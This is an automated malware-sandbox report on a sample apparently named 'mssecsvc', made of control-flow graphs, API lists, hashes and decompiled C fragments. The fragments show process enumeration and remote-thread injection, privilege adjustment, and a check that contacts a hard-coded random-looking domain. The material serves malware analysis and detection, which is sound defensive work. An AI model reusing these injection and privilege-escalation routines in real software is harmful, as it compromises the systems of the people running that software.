                                                                                                                                                control_flow_graph 13 ac042d-ac04a4 call ac10ce 16 ac04dd 13->16 17 ac04a6-ac04db call ac273c GetModuleHandleA 13->17 19 ac04e4-ac0509 call ac2750 GetVersion 16->19 17->19 23 ac050f-ac0530 VirtualAlloc 19->23 24 ac05ca-ac05d1 19->24 25 ac05a9-ac05b3 FindCloseChangeNotification 23->25 26 ac0532-ac0562 call ac0305 23->26 24->25 27 ac05d3-ac05fc SetProcessAffinityMask call ac05f2 24->27 25->24 26->25 38 ac0564-ac057b 26->38 32 ac05fe-ac061c 27->32 33 ac0621-ac0623 27->33 32->33 35 ac064c-ac0652 33->35 36 ac0625-ac0630 33->36 35->25 37 ac0658-ac0671 35->37 39 ac0639-ac0648 36->39 40 ac0632 36->40 37->25 41 ac0677-ac0690 37->41 38->25 46 ac057d-ac05a4 call ac05ba 38->46 39->35 40->39 41->25 42 ac0696-ac069c 41->42 44 ac069e-ac06b1 42->44 45 ac06d8-ac06de 42->45 44->25 47 ac06b7-ac06bd 44->47 48 ac06fc-ac0715 lstrcpyW call ac24ae 45->48 49 ac06e0-ac06f3 45->49 46->25 47->45 51 ac06bf-ac06d2 47->51 56 ac074c-ac0775 NtMapViewOfSection 48->56 57 ac0717-ac0746 GetPEB lstrcpyW lstrcatW call ac24ae 48->57 49->48 52 ac06f5 49->52 51->25 51->45 52->48 56->25 58 ac077b-ac078f call ac0305 NtOpenProcessToken 56->58 57->25 57->56 64 ac07c5-ac07e4 CreateToolhelp32Snapshot Process32First 58->64 65 ac0791-ac07a3 call ac115d call ac07ac 58->65 67 ac07eb-ac07f5 Process32Next 64->67 76 ac080e-ac080f 65->76 77 ac07a5 65->77 69 ac0865-ac0872 FindCloseChangeNotification 67->69 70 ac07f7-ac07fb 67->70 69->25 70->67 72 ac07fd-ac080d OpenProcess 70->72 72->67 74 ac080f 72->74 75 ac0810-ac0818 call ac2574 74->75 82 ac085c-ac0863 FindCloseChangeNotification 75->82 83 ac081a-ac0820 75->83 76->75 77->75 79 ac07a7-ac07e4 CreateToolhelp32Snapshot Process32First 77->79 79->67 82->67 83->82 84 ac0822-ac0832 83->84 84->82 85 ac0834-ac084b CreateRemoteThread 84->85 85->82 86 ac084d-ac0857 call ac05ba 85->86 86->82
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00AC04BE
                                                                                                                                                • GetVersion.KERNEL32 ref: 00AC0500
                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 00AC0528
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00AC05AD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocChangeCloseFindHandleModuleNotificationVersionVirtual
                                                                                                                                                • String ID: \BaseNamedObjects\axytVt$\BaseNamedObjects\axytVt$csrs
                                                                                                                                                • API String ID: 2920002527-8628898
                                                                                                                                                • Opcode ID: 5e26fa20f83f5e6203321ab9e5c6cfdbb76e6a20a0cc65ba3ebce16670a95049
                                                                                                                                                • Instruction ID: c9976dfedfb1afd437706d3be4c87a3e70cf6d6c5a0f9f16f252109be06c3263
                                                                                                                                                • Opcode Fuzzy Hash: 5e26fa20f83f5e6203321ab9e5c6cfdbb76e6a20a0cc65ba3ebce16670a95049
                                                                                                                                                • Instruction Fuzzy Hash: ECB1A771605249FFEB259F24C80AFAA3BA9EF45710F12412CF9099E181C7F09F958B69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 88 ac05f2-ac0615 GetModuleHandleA call ac10ce 91 ac05a9-ac05b3 FindCloseChangeNotification 88->91 92 ac0617-ac0630 88->92 96 ac05ca-ac05d1 91->96 93 ac0639-ac0648 92->93 94 ac0632 92->94 95 ac064c-ac0652 93->95 94->93 95->91 97 ac0658-ac0671 95->97 96->91 98 ac05d3-ac05fc SetProcessAffinityMask call ac05f2 96->98 97->91 99 ac0677-ac0690 97->99 105 ac05fe-ac061c 98->105 106 ac0621-ac0623 98->106 99->91 101 ac0696-ac069c 99->101 103 ac069e-ac06b1 101->103 104 ac06d8-ac06de 101->104 103->91 107 ac06b7-ac06bd 103->107 108 ac06fc-ac0715 lstrcpyW call ac24ae 104->108 109 ac06e0-ac06f3 104->109 105->106 106->95 110 ac0625-ac0630 106->110 107->104 111 ac06bf-ac06d2 107->111 115 ac074c-ac0775 NtMapViewOfSection 108->115 116 ac0717-ac0746 GetPEB lstrcpyW lstrcatW call ac24ae 108->116 109->108 112 ac06f5 109->112 110->93 110->94 111->91 111->104 112->108 115->91 117 ac077b-ac078f call ac0305 NtOpenProcessToken 115->117 116->91 116->115 122 ac07c5-ac07e4 CreateToolhelp32Snapshot Process32First 117->122 123 ac0791-ac07a3 call ac115d call ac07ac 117->123 125 ac07eb-ac07f5 Process32Next 122->125 134 ac080e-ac080f 123->134 135 ac07a5 123->135 127 ac0865-ac0872 FindCloseChangeNotification 125->127 128 ac07f7-ac07fb 125->128 127->91 128->125 130 ac07fd-ac080d OpenProcess 128->130 130->125 132 ac080f 130->132 133 ac0810-ac0818 call ac2574 132->133 140 ac085c-ac0863 FindCloseChangeNotification 133->140 141 ac081a-ac0820 133->141 134->133 135->133 137 ac07a7-ac07e4 CreateToolhelp32Snapshot Process32First 135->137 137->125 140->125 141->140 142 ac0822-ac0832 141->142 142->140 143 ac0834-ac084b CreateRemoteThread 142->143 143->140 144 ac084d-ac0857 call ac05ba 143->144 144->140
                                                                                                                                                APIs
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00AC05AD
                                                                                                                                                • GetModuleHandleA.KERNEL32(00AC05EC), ref: 00AC05F2
                                                                                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\axytVt,\BaseNamedObjects\axytVt), ref: 00AC070A
                                                                                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\axytVt,?), ref: 00AC072D
                                                                                                                                                • lstrcatW.KERNEL32(\BaseNamedObjects\axytVt,\axytVt), ref: 00AC073B
                                                                                                                                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 00AC076B
                                                                                                                                                • NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 00AC0786
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AC07C9
                                                                                                                                                • Process32First.KERNEL32 ref: 00AC07DC
                                                                                                                                                • Process32Next.KERNEL32 ref: 00AC07ED
                                                                                                                                                • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AC0805
                                                                                                                                                • CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00AC0842
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AC085D
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE ref: 00AC086C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ChangeCloseFindNotification$CreateOpenProcessProcess32lstrcpy$FirstHandleModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
                                                                                                                                                • String ID: \BaseNamedObjects\axytVt$\BaseNamedObjects\axytVt$csrs
                                                                                                                                                • API String ID: 3804105423-8628898
                                                                                                                                                • Opcode ID: 587852de3d39a4d695cdbfc1c95892cdb4d54edcd7c040a1b51e64314113049a
                                                                                                                                                • Instruction ID: 610f2c599af7f5930dec5f1ded713f148c7349b5d241dd5c5161f330a18b3d1f
                                                                                                                                                • Opcode Fuzzy Hash: 587852de3d39a4d695cdbfc1c95892cdb4d54edcd7c040a1b51e64314113049a
                                                                                                                                                • Instruction Fuzzy Hash: A3719972604209FFEB259F10C84AFAE3B6DEF45311F12402CE909AE0D1C7B59F459B99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 250 ac252f-ac2573 NtOpenSection
                                                                                                                                                APIs
                                                                                                                                                • NtOpenSection.NTDLL(?,0000000E), ref: 00AC255E
                                                                                                                                                Strings
                                                                                                                                                • \BaseNamedObjects\axytVt, xrefs: 00AC254B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: OpenSection
                                                                                                                                                • String ID: \BaseNamedObjects\axytVt
                                                                                                                                                • API String ID: 1950954290-2943719413
                                                                                                                                                • Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                                                                                • Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
                                                                                                                                                • Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                                                                                • Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 251 ac2574-ac257c call ac252f 254 ac2661-ac2664 251->254 255 ac2582-ac25b4 NtMapViewOfSection FindCloseChangeNotification 251->255 255->254 256 ac25ba-ac25c0 255->256 257 ac25ce-ac25d8 256->257 258 ac25c2-ac25cb 256->258 259 ac25ef-ac262a call ac2477 * 3 257->259 260 ac25da-ac25e2 257->260 258->257 269 ac262c-ac2632 call ac2477 259->269 270 ac2637-ac263f 259->270 260->259 262 ac25e4-ac25ea call ac2477 260->262 262->259 269->270 272 ac264c-ac2654 270->272 273 ac2641-ac2647 call ac2477 270->273 272->254 275 ac2656-ac265c call ac2477 272->275 273->272 275->254
APIs
• Part of subcall function 00AC252F: NtOpenSection.NTDLL(?,0000000E), ref: 00AC255E
• NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 00AC25A4
• FindCloseChangeNotification.KERNELBASE(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,00AC0815), ref: 00AC25AC
Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: Section$ChangeCloseFindNotificationOpenView
• String ID:
• API String ID: 1694706092-0
• Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
• Instruction ID: 29aab9b1342b60392af6199293618f237a779856f747a9fba381fffd22353668
• Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
• Instruction Fuzzy Hash: 5E211870300646BBEB28DF25CD56FAA7369EF80B44F41011CF8198E194DBB6AE24C728
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
[graph rendering not recoverable from extraction; single basic block ac1422-ac1474, calling LookupPrivilegeValueA and NtAdjustPrivilegesToken]
APIs
• LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00AC145A
• NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00AC146A
Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: AdjustLookupPrivilegePrivilegesTokenValue
• String ID:
• API String ID: 3615134276-0
• Opcode ID: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
• Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
• Opcode Fuzzy Hash: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
• Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
[graph rendering not recoverable from extraction; single basic block ac2477-ac24ad, calling NtProtectVirtualMemory and NtWriteVirtualMemory]
APIs
• NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 00AC249B
• NtWriteVirtualMemory.NTDLL ref: 00AC24A4
Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: MemoryVirtual$ProtectWrite
• String ID:
• API String ID: 151266762-0
• Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
• Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
• Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
• Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
[graph rendering not recoverable from extraction; single basic block ac144a-ac1474, calling LookupPrivilegeValueA and NtAdjustPrivilegesToken]
APIs
• LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00AC145A
• NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00AC146A
Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: AdjustLookupPrivilegePrivilegesTokenValue
• String ID:
• API String ID: 3615134276-0
• Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
• Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
• Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
• Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
[graph rendering not recoverable from extraction; basic blocks 409a16-409b67, calling 409ba1, 409b8c and 408140, with __set_app_type, __p__fmode, __p__commode, __setusermatherr, _initterm, __getmainargs, GetStartupInfoA, GetModuleHandleA, exit and _XcptFilter]
C-Code - Quality: 71%
_entry_(void* __ebx, void* __edi, void* __esi) {
	CHAR* _v8;
	intOrPtr* _v24;
	intOrPtr _v28;
	struct _STARTUPINFOA _v96;
	int _v100;
	char** _v104;
	int _v108;
	void _v112;
	char** _v116;
	intOrPtr* _v120;
	intOrPtr _v124;
	void* _t27;
	intOrPtr _t36;
	signed int _t38;
	int _t40;
	intOrPtr* _t41;
	intOrPtr _t42;
	intOrPtr _t49;
	intOrPtr* _t55;
	intOrPtr _t58;
	intOrPtr _t61;

	_push(0xffffffff);
	_push(0x40a1a0);
	_push(0x409ba2);
	_push( *[fs:0x0]);
	 *[fs:0x0] = _t58;
	_v28 = _t58 - 0x68;
	_v8 = 0;
	__set_app_type(2);
	 *0x70f894 =  *0x70f894 | 0xffffffff;
	 *0x70f898 =  *0x70f898 | 0xffffffff;
	 *(__p__fmode()) =  *0x70f88c;
	 *(__p__commode()) =  *0x70f888;
	 *0x70f890 = _adjust_fdiv;
	_t27 = E00409BA1( *_adjust_fdiv);
	_t61 =  *0x431410; // 0x1
	if(_t61 == 0) {
		__setusermatherr(E00409B9E);
	}
	E00409B8C(_t27);
	_push(0x40b010);
	_push(0x40b00c);
	L00409B86();
	_v112 =  *0x70f884;
	__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
	_push(0x40b008);
	_push(0x40b000); // executed
	L00409B86(); // executed
	_t55 =  *_acmdln;
	_v120 = _t55;
	if( *_t55 != 0x22) {
		while( *_t55 > 0x20) {
			_t55 = _t55 + 1;
			_v120 = _t55;
		}
	} else {
		do {
			_t55 = _t55 + 1;
			_v120 = _t55;
			_t42 =  *_t55;
		} while (_t42 != 0 && _t42 != 0x22);
		if( *_t55 == 0x22) {
			L6:
			_t55 = _t55 + 1;
			_v120 = _t55;
		}
	}
	_t36 =  *_t55;
	if(_t36 != 0 && _t36 <= 0x20) {
		goto L6;
	}
	_v96.dwFlags = 0;
	GetStartupInfoA( &_v96);
	if((_v96.dwFlags & 0x00000001) == 0) {
		_t38 = 0xa;
	} else {
		_t38 = _v96.wShowWindow & 0x0000ffff;
	}
	_push(_t38);
	_push(_t55);
	_push(0);
	_push(GetModuleHandleA(0));
	_t40 = E00408140();
	_v108 = _t40;
	exit(_t40);
	_t41 = _v24;
	_t49 =  *((intOrPtr*)( *_t41));
	_v124 = _t49;
	_push(_t41);
	_push(_t49);
	L00409B80();
	return _t41;
}
Disassembly address column for the C code above: 0x00409a19 to 0x00409b67 (the per-instruction pairing with the decompiled lines was not preserved).

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
• Source File: 00000004.00000002.499068443.0000000000409000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.499000927.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499030707.0000000000401000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499102818.000000000040A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499128705.000000000040B000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499145703.000000000040F000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499190020.0000000000431000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.501302167.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 801014965-0
                                                                                                                                                • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                                                                                                                • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                                                                                                                                                • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                                                                                                                • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

Control-flow Graph (rendered image; legend: Executed / Not Executed)

Graph blocks span 0xac05a9 to 0xac0872. The block list shows process enumeration via CreateToolhelp32Snapshot, Process32First and Process32Next, followed on a match by OpenProcess and CreateRemoteThread; other blocks reference FreeLibrary, FindCloseChangeNotification, SetProcessAffinityMask, lstrcpyW, lstrcatW, GetPEB, NtMapViewOfSection, NtOpenProcessToken and a subcall to 0xac144a (LookupPrivilegeValueA / NtAdjustPrivilegesToken, see APIs below).
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00AC144A: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00AC145A
                                                                                                                                                  • Part of subcall function 00AC144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00AC146A
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00AC05AD
                                                                                                                                                • FreeLibrary.KERNEL32(745B0000,?,00AC079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AC07B8
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,00AC079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AC07BF
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AC07C9
                                                                                                                                                • Process32First.KERNEL32 ref: 00AC07DC
                                                                                                                                                • Process32Next.KERNEL32 ref: 00AC07ED
                                                                                                                                                • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AC0805
                                                                                                                                                • CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00AC0842
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AC085D
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE ref: 00AC086C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ChangeCloseFindNotification$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
                                                                                                                                                • String ID: csrs
                                                                                                                                                • API String ID: 238827593-2321902090
                                                                                                                                                • Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                                                                                                                                                • Instruction ID: 210692ee3e3c0a2648e371233e90cf56f5d7bbaf33f6bfa968fa192c927ddead
                                                                                                                                                • Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                                                                                                                                                • Instruction Fuzzy Hash: 57112B30601205FFFB255F21CD4AFBF3A6DEF44701F01402DF94A9A081CAB49B019AAA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                			E00408140() {
                                                                                                                                                				char* _v1;
                                                                                                                                                				char* _v3;
                                                                                                                                                				char* _v7;
                                                                                                                                                				char* _v11;
                                                                                                                                                				char* _v15;
                                                                                                                                                				char* _v19;
                                                                                                                                                				char* _v23;
                                                                                                                                                				void _v80;
                                                                                                                                                				char _v100;
                                                                                                                                                				char* _t12;
                                                                                                                                                				void* _t13;
                                                                                                                                                				void* _t27;
                                                                                                                                                
                                                                                                                                                				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
                                                                                                                                                				asm("movsb");
                                                                                                                                                				_v23 = _t12;
                                                                                                                                                				_v19 = _t12;
                                                                                                                                                				_v15 = _t12;
                                                                                                                                                				_v11 = _t12;
                                                                                                                                                				_v7 = _t12;
                                                                                                                                                				_v3 = _t12;
                                                                                                                                                				_v1 = _t12;
                                                                                                                                                				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
                                                                                                                                                				_t27 = _t13;
                                                                                                                                                				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
                                                                                                                                                				InternetCloseHandle(_t27); // executed
                                                                                                                                                				InternetCloseHandle(0);
                                                                                                                                                				E00408090();
                                                                                                                                                				return 0;
                                                                                                                                                			}

Instruction addresses for the decompiled block above: 0x00408155, 0x00408157, 0x00408158, 0x0040815c, 0x00408160, 0x00408164, 0x00408168, 0x0040816c, 0x00408177, 0x0040817b, 0x0040818e, 0x00408194, 0x004081a7, 0x004081ab, 0x004081ad, 0x004081b9

                                                                                                                                                APIs
                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                                                                                                                                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 004081A7
                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 004081AB
                                                                                                                                                  • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                                                                                                                  • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                                                                                                                                                Strings
                                                                                                                                                • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.499030707.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.499000927.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499068443.0000000000409000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499102818.000000000040A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499128705.000000000040B000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499145703.000000000040F000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499190020.0000000000431000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.501302167.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                                                                                                                                                • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                                                                                                                • API String ID: 774561529-2942426231
                                                                                                                                                • Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                                                                                                                                                • Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
                                                                                                                                                • Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                                                                                                                                                • Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

Control-flow Graph (rendered image not reproduced; the executed / not-executed colouring is lost). Basic blocks 7fea4499-7fea45ae. From the entry block 7fea4499 control either goes straight to CreateFileA (block 7fea44c8) or first through GetFileAttributesA (7fea44a3) and SetFileAttributesA (7fea44af). After CreateFileA the paths through 7fea4506 and 7fea4527 both reach CreateFileMappingA (7fea4558), then MapViewOfFile (7fea458d), ending at block 7fea45a8.
                                                                                                                                                APIs
                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44A4
                                                                                                                                                • SetFileAttributesA.KERNELBASE(?,00000000,?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44B8
                                                                                                                                                • CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44ED
                                                                                                                                                • CreateFileMappingA.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61), ref: 7FEA4565
                                                                                                                                                • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61), ref: 7FEA459A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
